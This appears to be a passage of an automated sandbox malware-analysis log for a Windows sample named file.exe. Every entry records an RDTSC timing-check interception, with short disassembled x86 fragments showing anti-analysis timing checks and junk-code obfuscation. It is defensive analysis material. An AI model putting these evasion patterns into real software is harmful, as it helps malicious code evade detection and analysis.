                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FDED second address: F7FDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FDF1 second address: F7FE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jng 00007F4FE9502C56h 0x00000015 pop eax 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FE07 second address: F7FE1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B1h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8581C second address: F85820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85820 second address: F8582A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A904 second address: F8A923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F4FE9502C5Fh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F4FE9502C56h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A923 second address: F8A927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89D89 second address: F89D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89D8D second address: F89D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89D93 second address: F89D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89D9B second address: F89D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89F0A second address: F89F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4FE9502C69h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89F28 second address: F89F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4FE915D6A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A079 second address: F8A0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C5Ch 0x00000009 pop ecx 0x0000000a jmp 00007F4FE9502C67h 0x0000000f jns 00007F4FE9502C5Eh 0x00000015 pushad 0x00000016 jmp 00007F4FE9502C5Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A0C1 second address: F8A0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A0C9 second address: F8A0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007F4FE9502C6Ah 0x0000000c je 00007F4FE9502C58h 0x00000012 jne 00007F4FE9502C5Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D08A second address: F8D0A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D0A2 second address: F8D0F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FE9502C5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F4FE9502C68h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 push ecx 0x00000017 jmp 00007F4FE9502C67h 0x0000001c pop ecx 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jbe 00007F4FE9502C68h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D0F9 second address: F8D0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D0FD second address: F8D101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D101 second address: F8D140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F4FE915D6A8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 movsx esi, si 0x00000024 mov dword ptr [ebp+122D5B45h], edx 0x0000002a call 00007F4FE915D6A9h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D140 second address: F8D146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D146 second address: F8D194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4FE915D6AAh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007F4FE915D6B0h 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 pop eax 0x00000025 jbe 00007F4FE915D6A6h 0x0000002b popad 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D194 second address: F8D1B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C64h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D1B6 second address: F8D1BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D1BC second address: F8D1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D1C0 second address: F8D1C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D3A6 second address: F8D3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D3AB second address: F8D3C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4FE915D6ACh 0x00000008 jg 00007F4FE915D6A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DD36 second address: F8DD3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DD3C second address: F8DD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DD40 second address: F8DDA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007F4FE9502C6Fh 0x0000000f xchg eax, ebx 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F4FE9502C58h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov si, E32Bh 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F4FE9502C68h 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DDA6 second address: F8DDAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E23B second address: F8E23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E2AC second address: F8E2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E2B3 second address: F8E2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C5Bh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E395 second address: F8E3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4FE915D6AFh 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E828 second address: F8E82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E82C second address: F8E896 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F4FE915D6B0h 0x00000013 jg 00007F4FE915D6A6h 0x00000019 popad 0x0000001a pop edx 0x0000001b nop 0x0000001c and di, 6660h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F4FE915D6A8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d movzx edi, ax 0x00000040 push 00000000h 0x00000042 mov di, 66DBh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F4FE915D6ADh 0x0000004e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E896 second address: F8E89B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F375 second address: F8F390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4FE915D6ACh 0x0000000a jnc 00007F4FE915D6A6h 0x00000010 popad 0x00000011 push eax 0x00000012 jc 00007F4FE915D6B0h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F18E second address: F8F194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA99 second address: F8FAA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9188D second address: F91891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91891 second address: F918AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4FE915D6ACh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F918AB second address: F918B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4FE9502C56h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92347 second address: F92398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F4FE915D6ACh 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D18E8h], esi 0x00000013 push 00000000h 0x00000015 mov di, F6D0h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F4FE915D6A8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 or dword ptr [ebp+12454AC0h], ebx 0x0000003b xchg eax, ebx 0x0000003c je 00007F4FE915D6B8h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92398 second address: F9239C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9239C second address: F923A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92D54 second address: F92DC4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE9502C5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jmp 00007F4FE9502C5Fh 0x00000011 pop ebx 0x00000012 nop 0x00000013 jmp 00007F4FE9502C68h 0x00000018 push 00000000h 0x0000001a jg 00007F4FE9502C62h 0x00000020 push 00000000h 0x00000022 add dword ptr [ebp+122D1B2Ch], esi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007F4FE9502C66h 0x00000031 jmp 00007F4FE9502C60h 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9390E second address: F93913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F95535 second address: F9553F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9553F second address: F95549 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE915D6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96D29 second address: F96D32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96D32 second address: F96D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97C71 second address: F97C7B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96E8A second address: F96E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97C7B second address: F97CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F4FE9502C56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4FE9502C67h 0x00000014 nop 0x00000015 jmp 00007F4FE9502C5Ah 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F4FE9502C5Dh 0x00000022 mov di, si 0x00000025 pop ebx 0x00000026 pop edi 0x00000027 push 00000000h 0x00000029 adc di, 8FC8h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97CCE second address: F97CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96F5F second address: F96F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97CD3 second address: F97CD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98C70 second address: F98C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F4FE9502C56h 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97E1E second address: F97E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97E24 second address: F97E36 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4FE9502C58h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97E36 second address: F97E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B8h 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97F13 second address: F97F18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98F0B second address: F98F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C9E0 second address: F9C9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C9E6 second address: F9C9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C9EA second address: F9C9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C9EE second address: F9CA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4FE915D6B9h 0x0000000e nop 0x0000000f add ebx, dword ptr [ebp+122D18C6h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F4FE915D6A8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 xor edi, 4461C77Ch 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F4FE915D6A8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CA73 second address: F9CA7D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FE9502C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D93B second address: F9D93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D93F second address: F9D9B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc ebx, 7D866DE0h 0x00000012 push 00000000h 0x00000014 mov edi, edx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F4FE9502C58h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov di, bx 0x00000035 xchg eax, esi 0x00000036 jmp 00007F4FE9502C69h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4FE9502C5Ch 0x00000043 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CBDF second address: F9CBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CBE4 second address: F9CC05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C63h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CC05 second address: F9CC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CC09 second address: F9CC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CC0F second address: F9CC22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6AFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E8A2 second address: F9E8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DBA3 second address: F9DBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DBA7 second address: F9DBAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DBAB second address: F9DBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0844 second address: FA0853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0853 second address: FA08B0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4FE915D6A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jng 00007F4FE915D6B2h 0x00000013 jne 00007F4FE915D6ACh 0x00000019 mov bx, 8225h 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D1B35h], edx 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F4FE915D6A8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 jg 00007F4FE915D6A9h 0x00000047 push eax 0x00000048 pushad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1824 second address: FA182E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4FE9502C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
